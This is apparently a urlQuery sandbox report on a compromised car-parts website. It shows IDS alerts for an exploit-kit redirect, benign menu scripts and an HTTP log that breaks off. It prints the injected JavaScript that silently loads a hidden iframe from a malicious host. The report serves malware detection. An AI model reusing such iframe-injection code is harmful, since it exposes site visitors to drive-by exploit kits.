Overview

URLhttp://www.jdmsport.com/
IP198.65.228.124
ASNAS2914 NTT America, Inc.
Location United States
Report completed2012-11-08 03:27:35 CET
StatusLoading report..
urlQuery Alerts Detected malicious iframe injection
Detected a TDS URL pattern


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader8.0
Java1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp Source IP Destination IP Severity Alert
2012-11-08 03:26:02 urlQuery Client 46.235.8.1752ET CURRENT_EVENTS Likely TDS redirecting to exploit kit
2012-11-08 03:26:11 urlQuery Client 46.235.8.1752ET CURRENT_EVENTS Likely TDS redirecting to exploit kit
2012-11-08 03:26:12 195.159.219.10 urlQuery Client3FILEMAGIC Macromedia Flash data (compressed),
2012-11-08 03:26:13 74.113.233.128 urlQuery Client3FILEMAGIC Macromedia Flash data,
2012-11-08 03:26:15 173.194.69.102 urlQuery Client3FILEMAGIC Macromedia Flash data (compressed),
2012-11-08 03:26:18 195.159.219.10 urlQuery Client3FILEMAGIC Macromedia Flash data (compressed),
2012-11-08 03:26:18 173.194.69.91 urlQuery Client3FILEMAGIC Macromedia Flash data (compressed),
2012-11-08 03:26:18 173.194.69.91 urlQuery Client3FILEMAGIC Macromedia Flash data (compressed),
2012-11-08 03:26:28 173.194.69.91 urlQuery Client3FILEMAGIC Macromedia Flash data (compressed),
2012-11-08 03:26:28 173.194.69.91 urlQuery Client3FILEMAGIC Macromedia Flash data (compressed),
Snort /w Sourcefire VRT No alerts detected


Recent reports on same IP/ASN/Domain

Last 4 reports on IP: 198.65.228.124

Date Alerts / IDS URL IP
2013-01-03 14:13:392 / 0http://jdmsport.com/catalog/index.php?option=com_zoo198.65.228.124
2012-11-07 19:14:532 / 9http://jdmsport.com/catalog/198.65.228.124
2012-11-07 18:00:223 / 10http://jdmsport.com/198.65.228.124
2012-10-31 14:24:563 / 10http://jdmsport.com/catalog198.65.228.124

Last 6 reports on ASN: AS2914 NTT America, Inc.

Date Alerts / IDS URL IP
2013-02-13 20:43:430 / 1http://www.aviosdealbercas.com.mx/js/jquery.js161.58.108.254
2013-02-13 19:53:400 / 13http://ideastelcel.com128.241.121.56
2013-02-13 17:36:590 / 0http://www.helpdomain.com.au/mlwzlu/cqyv441qf5cd2nbnarblg95vycmfgh7xrvcjzwgzsnyfu7?h1445osqjxe2 (...)199.236.96.7
2013-02-13 17:16:560 / 0http://wowelectrical.com.au/Scripts/gen_validatorv2.js128.121.207.177
2013-02-13 16:46:100 / 0http://130.94.67.158130.94.67.158
2013-02-13 14:23:451 / 30http://nature.or.jp/letter.htm101.110.212.39



JavaScript

Executed Scripts (20)


Executed Evals (5)

#1 JavaScript::Eval (size: 585, repeated: 2) - Alert detect on script (Severity: 2)

		if (document.getElementsByTagName('body')[0]) {
		    iframer();
		} else {
		    document.write("<iframe src='http://gqftitjox.kwik.to/t/vc.php?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
		}
		function iframer() {
		    var f = document.createElement('iframe');
		    f.setAttribute('src', 'http://gqftitjox.kwik.to/t/vc.php?go=2');
		    f.style.visibility = 'hidden';
		    f.style.position = 'absolute';
		    f.style.left = '0';
		    f.style.top = '0';
		    f.setAttribute('width', '10');
		    f.setAttribute('height', '10');
		    document.getElementsByTagName('body')[0].appendChild(f);
		}

#2 JavaScript::Eval (size: 1213, repeated: 1)

var YOOAccordionMenu = new Class({
    initialize: function(togglers, elements, options) {
        this.setOptions({
            accordion: 'default',
            onActive: function(tog) {
                tog.addClass('active');
                tog.getFirst().addClass('active')
            },
            onBackground: function(tog) {
                tog.removeClass('active');
                tog.getFirst().removeClass('active')
            }
        }, options);
        this.togs = togglers;
        this.elms = elements;
        switch (this.options.accordion) {
        case 'slide':
            this.createSlide();
            break;
        default:
            this.createDefault()
        }
    },
    createDefault: function() {
        var options = {};
        if (!$defined(this.options.display) && !$defined(this.options.show)) {
            options = {
                show: -1
            }
        }
        $ES(this.togs).each(function(tog, i) {
            if (tog.hasClass('active')) options = {
                show: i
            }
        }.bind(this));
        var accordionMenu = new Fx.Accordion(this.togs, this.elms, $extend(this.options, options))
    },
    createSlide: function() {
        $ES(this.togs).each(function(tog, i) {
            var span = tog.getElement('span');
            var ul = tog.getElement(this.elms);
            var fx = new Fx.Slide(ul, {
                transition: Fx.Transitions.linear,
                duration: 250
            });
            if (!(tog.hasClass('active') || this.options.display == 'all' || this.options.display == i)) {
                fx.hide()
            }
            span.addEvent('click', function() {
                fx.toggle().chain(function() {
                    tog.toggleClass('active');
                    tog.getFirst().toggleClass('active')
                })
            })
        }.bind(this))
    }
});
YOOAccordionMenu.implement(new Options);

#3 JavaScript::Eval (size: 1874, repeated: 1)

var YOOBase = {
    matchHeight: function(elements, min) {
        var max = 0;
        $$(elements).each(function(element, i) {
            var height;
            if (element.offsetHeight) {
                height = element.offsetHeight
            } else if (element.style.pixelHeight) {
                height = element.style.pixelHeight
            }
            max = Math.max(max, height)
        });
        if (min != undefined) {
            max = Math.max(max, min)
        }
        $$(elements).each(function(element, i) {
            var offset = element.getStyle('padding-top').toInt() + element.getStyle('padding-bottom').toInt() + element.getStyle('border-top-width').toInt() + element.getStyle('border-bottom-width').toInt();
            var height = max - offset;
            var style = window.ie6 ? 'height' : 'min-height';
            element.setStyle(style, height + 'px')
        })
    }
};
var YOOMorph = new Class({
    initialize: function(element, enter, leave, enterFx, leaveFx, elementFx) {
        this.setOptions({
            duration: 500,
            transition: Fx.Transitions.expoOut,
            wait: false,
            ignore: ''
        }, enterFx);
        var options = this.options;
        var ignore = null;
        if ($chk(options.ignore)) {
            ignore = $$(options.ignore)
        }
        $$(element).each(function(el, i) {
            if (ignore && ignore.contains(el)) return;
            var fxs = [];
            var elfx = [el];
            if (elementFx) {
                elfx = el.getElementsBySelector(elementFx)
            }
            elfx.each(function(elm, i) {
                fxs[i] = new Fx.Styles(elm, options)
            });
            el.addEvent('mouseenter', function(e) {
                fxs.each(function(fx) {
                    fx.setOptions(options, enterFx).start(enter)
                })
            });
            el.addEvent('mouseleave', function(e) {
                fxs.each(function(fx) {
                    fx.setOptions(options, leaveFx).start(leave)
                })
            })
        })
    }
});
YOOMorph.implement(new Options);
var YOOBackgroundFx = new Class({
    initialize: function(options) {
        this.setOptions({
            transition: Fx.Transitions.linear,
            duration: 9000,
            wait: false,
            colors: ['#FFFFFF', '#999999']
        }, options);
        var body = new Element(document.body);
        var fx = body.effects(this.options);
        var index = 0;
        var colors = this.options.colors;
        var timer = animate.periodical(this.options.duration * 2);
        animate();

        function animate() {
            fx.start({
                'background-color': colors[index]
            });
            if (index + 1 >= colors.length) {
                index = 0
            } else {
                index++
            }
        }
    }
});
YOOBackgroundFx.implement(new Options);

#4 JavaScript::Eval (size: 3248, repeated: 1)

var YOODropdownMenu = new Class({
    initialize: function(element, options) {
        this.setOptions({
            mode: 'default',
            itemSelector: 'li',
            dropdownSelector: 'ul',
            duration: 600,
            remainTime: 800,
            remainClass: 'remain',
            transition: Fx.Transitions.linear,
            wait: false
        }, options);
        var obj = this;
        this.menu = $(element);
        this.timer = null;
        this.dropdowns = [];
        this.remain = [];
        if (!this.menu) return;
        this.menu.addEvents({
            mouseenter: function(event) {
                obj.remain = [];
                obj.removeRemain(10)
            },
            mouseleave: function(event) {
                obj.remain.each(function(item) {
                    item.addClass(obj.options.remainClass)
                });
                obj.removeRemain(obj.options.remainTime)
            }
        });
        this.menu.getElements(this.options.itemSelector).each(function(item) {
            var dropdown = item.getElement(this.options.dropdownSelector);
            if (dropdown) {
                this.dropdowns.include(item);
                if (this.options.mode == 'slide') {
                    this.attachSlideFx(item, dropdown)
                } else {
                    this.attachDefaultFx(item, dropdown)
                }
                item.addEvents({
                    mouseenter: function(event) {
                        item._dropdownhover = true;
                        obj.remain = [];
                        if (!item.hasClass(obj.options.remainClass) && !window.opera) {
                            item.fireEvent('fx.dropdown')
                        }
                    },
                    mouseleave: function(event) {
                        item._dropdownhover = false;
                        if (obj.menu != event.relatedTarget && !obj.menu.hasChild(event.relatedTarget)) {
                            obj.remain.include(item)
                        } else {
                            item.fireEvent('dropdownleave')
                        }
                    }
                })
            }
        }.bind(this))
    },
    attachDefaultFx: function(item, dropdown) {
        var styles = dropdown.getStyles('width', 'height', 'opacity');
        var reset = {
            'width': 0,
            'height': 0
        };
        var div = new Element('div').adopt(dropdown.getChildren()).injectInside(dropdown).setStyle('width', styles.width.toInt());
        var fx = new Fx.Styles(dropdown, this.options);
        switch (this.options.mode) {
        case 'width':
            reset = {
                'width': 0
            };
            break;
        case 'height':
            reset = {
                'height': 0
            };
            break
        }
        item.addEvent('fx.dropdown', function() {
            fx.stop();
            fx.element.setStyles($extend(reset, window.ie ? {
                'overflow': 'hidden'
            } : {
                'opacity': 0,
                'overflow': 'hidden'
            }));
            fx.start(styles).chain(function() {
                fx.element.setStyles(styles)
            })
        })
    },
    attachSlideFx: function(item, dropdown) {
        var styles = dropdown.getStyles('width', 'height', 'opacity');
        var div = new Element('div').adopt(dropdown.getChildren()).injectInside(dropdown);
        var fx1 = new Fx.Styles(dropdown, this.options);
        var fx2 = new Fx.Styles(div, this.options);
        item.addEvent('fx.dropdown', function() {
            fx1.stop();
            fx1.element.setStyles({
                'height': 0,
                'overflow': 'hidden'
            });
            fx1.start(styles).chain(function() {
                fx1.element.setStyles(styles)
            });
            fx2.stop();
            fx2.element.setStyles({
                'margin-top': -styles.height.toInt()
            });
            fx2.start({
                'margin-top': 0
            })
        })
    },
    removeRemain: function(delaytime) {
        $clear(this.timer);
        this.timer = (function() {
            this.dropdowns.each(function(item) {
                if (item.hasClass(this.options.remainClass) && !item._dropdownhover) item.fireEvent('dropdownleave');
                item.removeClass(this.options.remainClass)
            }.bind(this))
        }).delay(delaytime, this)
    },
    matchHeight: function() {
        if (this.menu) {
            this.menu.getElements('li.level2 div.sub').each(function(sub) {
                var hover = sub.getParent().getElement('div.hover-box4');
                var height = Math.max(sub.getCoordinates().height, hover.getCoordinates().height);
                var elements = [sub, hover];
                elements.each(function(element) {
                    var offset = element.getStyle('padding-top').toInt() + element.getStyle('padding-bottom').toInt() + element.getStyle('border-top-width').toInt() + element.getStyle('border-bottom-width').toInt();
                    element.setStyle('height', height - offset)
                })
            })
        }
    }
});
YOODropdownMenu.implement(new Events, new Options);

#5 JavaScript::Eval (size: 3112, repeated: 1)

var YOOFancyMenu = new Class({
    initialize: function(menu, options) {
        this.setOptions({
            transition: Fx.Transitions.sineInOut,
            duration: 500,
            wait: false,
            onClick: Class.empty,
            opacity: 1,
            mode: 'move',
            slideOffset: 30,
            itemSelector: 'li.level1',
            activeSelector: 'li.active',
            dropdownSelector: 'div.dropdown'
        }, options);
        if (!$(menu)) return;
        this.menu = $(menu);
        this.items = [];
        this.div = [];
        this.current = this.menu.getElement(this.options.activeSelector);
        this.menu.getElements(this.options.itemSelector).each(function(item, i) {
            var leaveevent = item.getElement(this.options.dropdownSelector) ? 'dropdownleave' : 'mouseleave';
            this.createBackground(item, i);
            item.addEvent('click', function(event) {
                this.clickItem(event, item)
            }.bind(this));
            item.addEvent('mouseenter', function() {
                this.mouseenterItem(item, i)
            }.bind(this));
            item.addEvent(leaveevent, function() {
                this.mouseleaveItem(item, i)
            }.bind(this))
        }.bind(this));
        if (this.options.mode == 'move') {
            if (this.current) {
                this.setCurrent(this.current)
            } else {
                var first = this.menu.getElement('li');
                first.addClass('active');
                first.addClass('current');
                this.setCurrent(first)
            }
        }
    },
    createBackground: function(item, i) {
        if (this.options.mode == 'move' && i != 0) return;
        var css = 'fancy ' + 'bg' + (i + 1);
        this.div[i] = new Element('div', {
            'class': 'fancy-1'
        }).adopt(new Element('div', {
            'class': 'fancy-2'
        }).adopt(new Element('div', {
            'class': 'fancy-3'
        })));
        this.div[i].fx = this.div[i].effects(this.options);
        this.items[i] = new Element('div', {
            'class': css
        }).adopt(this.div[i]).injectInside(this.menu);
        this.items[i].fx = this.items[i].effects(this.options)
    },
    setCurrent: function(item) {
        this.items[0].setStyles({
            'left': item.offsetLeft,
            'width': item.offsetWidth,
            'visibility': 'visible',
            'opacity': this.options.opacity
        });
        this.current = item
    },
    clickItem: function(event, item) {
        if (!this.current) this.setCurrent(item);
        this.current = item;
        this.options.onClick(new Event(event), item)
    },
    mouseenterItem: function(item, i) {
        if (item._fancyactive) return;
        item._fancyactive = true;
        switch (this.options.mode) {
        case 'fade':
            this.fadeFx(item, i, true);
            break;
        case 'slide':
            this.slideFx(item, i, true);
            break;
        default:
            this.moveFx(item, 0)
        }
    },
    mouseleaveItem: function(item, i) {
        item._fancyactive = false;
        switch (this.options.mode) {
        case 'fade':
            this.fadeFx(item, i, false);
            break;
        case 'slide':
            this.slideFx(item, i, false);
            break;
        default:
            this.moveFx(this.current, 0)
        }
    },
    moveFx: function(item, i) {
        if (!this.current) return;
        this.items[i].fx.custom({
            'left': [this.items[i].offsetLeft, item.offsetLeft],
            'width': [this.items[i].offsetWidth, item.offsetWidth]
        })
    },
    fadeFx: function(item, i, show) {
        if (show) {
            this.items[i].fx.setOptions(this.options);
            this.items[i].fx.set({
                'left': item.offsetLeft,
                'width': item.offsetWidth
            });
            this.items[i].fx.custom({
                'opacity': [0, 1]
            })
        } else {
            var dur = this.options.duration * 2;
            this.items[i].fx.setOptions({
                duration: dur
            });
            this.items[i].fx.custom({
                'opacity': [1, 0]
            })
        }
    },
    slideFx: function(item, i, show) {
        var offset = this.options.slideOffset;
        if (show) {
            this.items[i].fx.set({
                'opacity': 1,
                'left': item.offsetLeft,
                'width': item.offsetWidth
            });
            this.div[i].fx.set({
                'margin-top': offset
            });
            this.div[i].fx.custom({
                'margin-top': [offset, 0]
            })
        } else {
            this.div[i].fx.set({
                'margin-top': 0
            });
            this.div[i].fx.custom({
                'margin-top': [0, offset]
            })
        }
    }
});
YOOFancyMenu.implement(new Options);

Executed Writes (1)

#1 JavaScript::Write (size: 143, repeated: 2)

<iframe src='http://gqftitjox.kwik.to/t/vc.php?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>


HTTP Transactions (208)


Request Response
GET / HTTP/1.1

Host: www.jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/html
Date: Thu, 08 Nov 2012 02:25:59 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Wed, 04 Apr 2012 02:37:44 GMT
Etag: &quot;ffe369-108c-4f7bb3f8&quot;
Accept-Ranges: bytes
Content-Length: 4236
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
GET /t/vc.php?go=2 HTTP/1.1

Host: gqftitjox.kwik.to

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.jdmsport.com/
HTTP/1.1 200 OK

Content-Type: text/html
Date: Thu, 08 Nov 2012 02:34:46 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7+squeeze14
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
GET /favicon.ico HTTP/1.1

Host: www.jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: image/x-icon
Date: Thu, 08 Nov 2012 02:26:02 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 24 Feb 2011 22:08:17 GMT
Etag: &quot;ffe368-47e-4d66d6d1&quot;
Accept-Ranges: bytes
Content-Length: 1150
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
GET /catalog HTTP/1.1

Host: www.jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 301 Moved Permanently

Content-Type: text/html; charset=iso-8859-1
Date: Thu, 08 Nov 2012 02:26:07 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Location: http://jdmsport.com/catalog/
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /css?family=Oswald HTTP/1.1

Host: fonts.googleapis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
HTTP/1.1 200 OK

Content-Type: text/css
Expires: Thu, 08 Nov 2012 02:26:09 GMT
Date: Thu, 08 Nov 2012 02:26:09 GMT
Cache-Control: private, max-age=86400
Content-Length: 247
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
GET /catalog/templates/yoo_crystal/css/template.css HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: text/css
Date: Thu, 08 Nov 2012 02:26:09 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 03 Feb 2011 18:18:42 GMT
Etag: &quot;10053a4-ea-4d4af182&quot;
Accept-Ranges: bytes
Content-Length: 234
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
GET /catalog/media/zoo/applications/blog/templates/default/assets/css/zoo.css HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: text/css
Date: Thu, 08 Nov 2012 02:26:09 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 06 Jan 2011 06:54:06 GMT
Etag: &quot;1004010-ca-4d25670e&quot;
Accept-Ranges: bytes
Content-Length: 202
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
GET /catalog/plugins/system/yoo_effects/lightbox/shadowbox.css HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: text/css
Date: Thu, 08 Nov 2012 02:26:09 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 03 Feb 2011 20:45:01 GMT
Etag: &quot;10050aa-7ce-4d4b13cd&quot;
Accept-Ranges: bytes
Content-Length: 1998
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
GET /catalog/media/system/css/modal.css HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: text/css
Date: Thu, 08 Nov 2012 02:26:09 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 06 Jan 2011 06:51:52 GMT
Etag: &quot;1003fcb-487-4d256688&quot;
Accept-Ranges: bytes
Content-Length: 1159
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
GET /catalog/templates/yoo_crystal/css/custom.css HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: text/css
Date: Thu, 08 Nov 2012 02:26:09 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 03 Feb 2011 18:18:42 GMT
Etag: &quot;1005397-bc-4d4af182&quot;
Accept-Ranges: bytes
Content-Length: 188
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
GET /catalog/modules/mod_btslideshow/assets/skitter/css/skitter.styles.css HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: text/css
Date: Thu, 08 Nov 2012 02:26:09 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Wed, 18 Apr 2012 20:39:34 GMT
Etag: &quot;1009b0a-dcb-4f8f2686&quot;
Accept-Ranges: bytes
Content-Length: 3531
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
GET /catalog/modules/mod_zooslider/mod_zooslider.css.php HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: text/css; charset=UTF-8
Date: Thu, 08 Nov 2012 02:26:09 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Content-Encoding: gzip
Expires: Fri, 09 Nov 2012 02:26:09 GMT
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.17
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /catalog/modules/mod_yoo_login/mod_yoo_login.css.php HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: text/css; charset=UTF-8
Date: Thu, 08 Nov 2012 02:26:09 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Content-Encoding: gzip
Expires: Fri, 09 Nov 2012 02:26:09 GMT
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.17
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /catalog/components/com_zoo/assets/js/default.js HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Thu, 08 Nov 2012 02:26:09 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 06 Jan 2011 06:24:40 GMT
Etag: &quot;fff2d7-ec-4d256028&quot;
Accept-Ranges: bytes
Content-Length: 236
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
GET /catalog/components/com_k2/js/k2.js HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Thu, 08 Nov 2012 02:26:09 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 03 Feb 2011 20:35:14 GMT
Etag: &quot;fff1ae-b24-4d4b1182&quot;
Accept-Ranges: bytes
Content-Length: 2852
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
GET /catalog/components/com_k2/css/style.css HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: text/css
